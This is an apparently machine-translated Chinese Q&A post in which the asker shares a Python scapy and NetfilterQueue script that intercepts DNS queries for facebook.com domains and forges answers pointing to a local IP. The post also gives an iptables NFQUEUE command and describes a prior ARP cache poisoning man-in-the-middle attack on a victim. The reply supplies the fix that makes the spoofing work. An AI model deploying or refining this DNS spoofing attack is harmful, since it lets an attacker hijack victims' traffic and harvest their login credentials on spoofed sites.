Python dns欺骗不工作nome未解决

Question

我不知道为什么mi脚本不起作用，受害者浏览器显示: ERR: named not resolved。

我的脚本

from scapy.all import *
from netfilterqueue import NetfilterQueue

spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1

def dnsSpoof(packet):
        originalPayload = IP( packet.get_payload() )

        if not originalPayload.haslayer(DNSQR):
                # Not a dns query, accept and go on
                packet.accept()
        else:
                if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
                        print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()

                        # Build the spoofed response
                        spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/\
                          UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/\
                          DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,\
                          an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))

                        print "Spoofing DNS response to: " + spoofedPayload.summary()
                        packet.set_payload(str(spoofedPayload))
                        packet.accept()
                        print "------------------------------------------"
                else:
                        # DNS query but not for target spoofDomain, accept and go on
                        packet.accept()

# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)

# wait for packets
try:
    nfqueue.run()
except KeyboardInterrupt:
    print('')

nfqueue.unbind()

我使用iptables -t mangle -I -p udp -j NFQUEUE --queue-NUM1命令。

首先，我通过ARP缓存欺骗执行中间人攻击。我使用wireshark查看流量，它似乎还可以，我不知道发生了什么。

Answer 1

我解决了这个问题，我在寻找问题，我看不到，对不起

if not originalPayload.haslayer(DNSQR)

DNSQR是dns查询，我想获取dns答案，所以代码是：

if not originalPayload.haslayer(DNSRR)